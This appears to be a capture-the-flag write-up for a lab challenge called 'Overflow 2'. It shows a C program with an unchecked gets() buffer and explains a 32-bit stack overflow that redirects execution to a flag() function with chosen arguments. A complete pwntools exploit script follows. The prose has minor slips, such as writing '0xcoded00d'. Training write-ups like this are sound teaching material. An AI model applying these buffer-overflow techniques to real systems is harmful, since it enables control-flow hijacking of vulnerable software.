-
Notifications
You must be signed in to change notification settings - Fork 1
Overflow 2
Now try overwriting arguments. Can you get the flag from this program? You can find it in /problems/overflow-2_0_f4d7b52433d7aa96e72a63fdd5dcc9cc on the shell server. Source.
GDB can print the stack after you send arguments
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFSIZE 176
#define FLAGSIZE 64
void flag(unsigned int arg1, unsigned int arg2) {
char buf[FLAGSIZE];
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n");
exit(0);
}
fgets(buf,FLAGSIZE,f);
if (arg1 != 0xDEADBEEF)
return;
if (arg2 != 0xC0DED00D)
return;
printf(buf);
}
void vuln(){
char buf[BUFSIZE];
gets(buf);
puts(buf);
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
gid_t gid = getegid();
setresgid(gid, gid, gid);
puts("Please enter your string: ");
vuln();
return 0;
}
You can see the flag function in source code. This function print out the flag if arg1 == 0xdeadbeef and arg2 == 0xcoded00d. So our target is call the flag function with two parameters arg1 = 0xdeadbeef and arg2 = 0xcoded00d.
In vuln() , the gets() let us input without checking the boundary. So we can simply overwrite the return address of vuln(). You can change the return address of vuln() to the flag address.
payload = 'a'*offset + flag_add
In 32 bits system , when a function is called by main, the parameters is push on stack at ebp-8, ebp-c,... ( debug to see clearly).
So, we want to call the flag with 2 parameters, the payload must be:
payload = 'a'*offset + flag_add + [4 bytes return address] + [4 bytes arg1] + [4 bytes arg2]
from pwn import *
s = process('./vuln')
raw_input('debug')
flag = 0x80485e6
main = 0x80486b5
payload = 'a'*0xbc
payload += p32(flag)
payload += p32(main)
payload += p32(0xDEADBEEF)
payload += p32(0xC0DED00D)
s.sendline(payload)
s.interactive()